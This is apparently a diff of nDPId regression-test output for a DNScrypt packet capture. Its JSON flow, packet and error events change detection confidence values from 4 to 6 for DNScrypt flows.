+00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":117,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305192,"flow_last_seen":946739305192,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739305192,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"195.30.94.28","src_port":34885,"dst_port":8443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00225{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":118,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739305192} 00420{"packet_event_id":1,"packet_event_name":"packet","packet_id":118,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739305192,"pkt":"REREREREZmZmZmZmCABFAABQZYwAub0RtWAKAAABwx5eHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00601{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":119,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305192,"flow_last_seen":946739305192,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739305192,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"195.30.94.28","src_port":44093,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01142{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":119,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":1,"flow_last_seen":946739305192,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739305192,"pkt":"REREREREZmZmZmZmCABFAAIcZY5AAL0RdEsKAAABwx5eHKw9IPsCCOQQMsoBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAVmZm11YwNuZXQAABAAAQAAAAAAAAAAAAHKAAwBxgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":119,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305192,"flow_last_seen":946739305192,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739305192,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"195.30.94.28","src_port":44093,"dst_port":8443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":119,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305192,"flow_last_seen":946739305192,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739305192,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"195.30.94.28","src_port":44093,"dst_port":8443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00605{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":120,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305192,"flow_last_seen":946739305192,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739305192,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"195.30.94.28","src_port":53811,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02425{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":120,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":1,"flow_last_seen":946739305192,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739305192,"pkt":"REREREREZmZmZmZmCABFAAXcZY8gAL0RkIoKAAABwx5eHNIzIPsGBOBTMskBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAVmZm11YwNuZXQAABAAAQAAAAAAAAAAAAXGAAwFwgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":120,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305192,"flow_last_seen":946739305192,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739305192,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"195.30.94.28","src_port":53811,"dst_port":8443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":120,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305192,"flow_last_seen":946739305192,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739305192,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"195.30.94.28","src_port":53811,"dst_port":8443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00225{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":121,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739305192} 00420{"packet_event_id":1,"packet_event_name":"packet","packet_id":121,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739305192,"pkt":"REREREREZmZmZmZmCABFAABQZY8Aub0RtV0KAAABwx5eHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00704{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":122,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":2,"flow_last_seen":946739305192,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":224,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":224,"pkt_l4_len":190,"thread_ts_msec":946739305192,"pkt":"ZmZmZmZmRERERERECABFAADSF6JAADcRFw2LO8h0CgAAAQG7ktsAvkG1c5CBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydAhkbnNjcnlwdAJ1awAAEAABwAwAEAABAABwgAB9fEROU0MAAgAABjDMcMbz7yA0RLegztcBfq7VeYHKBaMLey+aMNVSTMo4Qj51\/gmF1JL4mny7Kl7CHKqU1ouuslp1lX1chQTTD+JLJw323p3g\/i9lq2cywGbzFxjIXwRFrAIdM6Cq64tY4ksnDfbeneAAAAABX1N7RV9UzMU="} 00605{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":123,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305192,"flow_last_seen":946739305192,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739305192,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"195.30.94.28","src_port":44282,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02425{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":123,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":1,"flow_last_seen":946739305192,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739305192,"pkt":"REREREREZmZmZmZmCABFAAXcZZAgAL0RkIkKAAABwx5eHKz6IPsGBAWJMs0BAAABAAAAAAABATINZG5zY3J5cHQtY2VydAVmZm11YwNuZXQAABAAAQAAAAAAAAAAAAXGAAwFwgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":123,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305192,"flow_last_seen":946739305192,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739305192,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"195.30.94.28","src_port":44282,"dst_port":8443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":123,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305192,"flow_last_seen":946739305192,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739305192,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"195.30.94.28","src_port":44282,"dst_port":8443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00225{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":124,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739305192} 00420{"packet_event_id":1,"packet_event_name":"packet","packet_id":124,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739305192,"pkt":"REREREREZmZmZmZmCABFAABQZZAAub0RtVwKAAABwx5eHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00704{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":125,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":2,"flow_last_seen":946739305194,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":224,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":224,"pkt_l4_len":190,"thread_ts_msec":946739305194,"pkt":"ZmZmZmZmRERERERECABFAADSF6NAADcRFwyLO8h0CgAAAQG75zoAvu1Tc5KBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydAhkbnNjcnlwdAJ1awAAEAABwAwAEAABAABwgAB9fEROU0MAAgAABjDMcMbz7yA0RLegztcBfq7VeYHKBaMLey+aMNVSTMo4Qj51\/gmF1JL4mny7Kl7CHKqU1ouuslp1lX1chQTTD+JLJw323p3g\/i9lq2cywGbzFxjIXwRFrAIdM6Cq64tY4ksnDfbeneAAAAABX1N7RV9UzMU="} @@ -267,26 +267,26 @@ 00701{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":129,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":2,"flow_last_seen":946739305218,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":222,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":222,"pkt_l4_len":188,"thread_ts_msec":946739305218,"pkt":"ZmZmZmZmRERERERECABFAADQ+LZAADgRZ2\/DHl4cCgAAASD7glkAvOtuMsuAAAABAAEAAAAAATINZG5zY3J5cHQtY2VydAVmZm11YwNuZXQAABAAAcAMABAAAQAADhAAfXxETlNDAAEAANu1cuNn82W5kyvuIYj3yDd11LkL534iAFDK9fBQA07jnu8CUEQwYJt1XxEE91D0YyFd2wLooVHv9yyAcc0SAAB5FL6yNLYbucmv1fHy4RsAcOv\/0XhGDt+qQ0bl\/YNRIXkUvrI0thu5ATQ9Gl8jB9hnnVXw"} 00601{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":130,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305219,"flow_last_seen":946739305219,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739305219,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.204.111","src_port":32970,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01142{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":130,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":1,"flow_last_seen":946739305219,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739305219,"pkt":"REREREREZmZmZmZmCABFAAIciBpAAL0RGIYKAAABjgTMb4DKAbsCCB1KAhEBAAABAAAAAAABATINZG5zY3J5cHQtY2VydANuczMCY2EFbHVnZ3MCY28AABAAAQAAAAAAAAAAAAHEAAwBwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":130,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305219,"flow_last_seen":946739305219,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739305219,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.204.111","src_port":32970,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":130,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305219,"flow_last_seen":946739305219,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739305219,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.204.111","src_port":32970,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00605{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":131,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305219,"flow_last_seen":946739305219,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739305219,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.204.111","src_port":60962,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02425{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":131,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":1,"flow_last_seen":946739305219,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739305219,"pkt":"REREREREZmZmZmZmCABFAAXciBwgAL0RNMQKAAABjgTMb+4iAbsGBKD1AgwBAAABAAAAAAABATINZG5zY3J5cHQtY2VydANuczMCY2EFbHVnZ3MCY28AABAAAQAAAAAAAAAAAAXAAAwFvAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA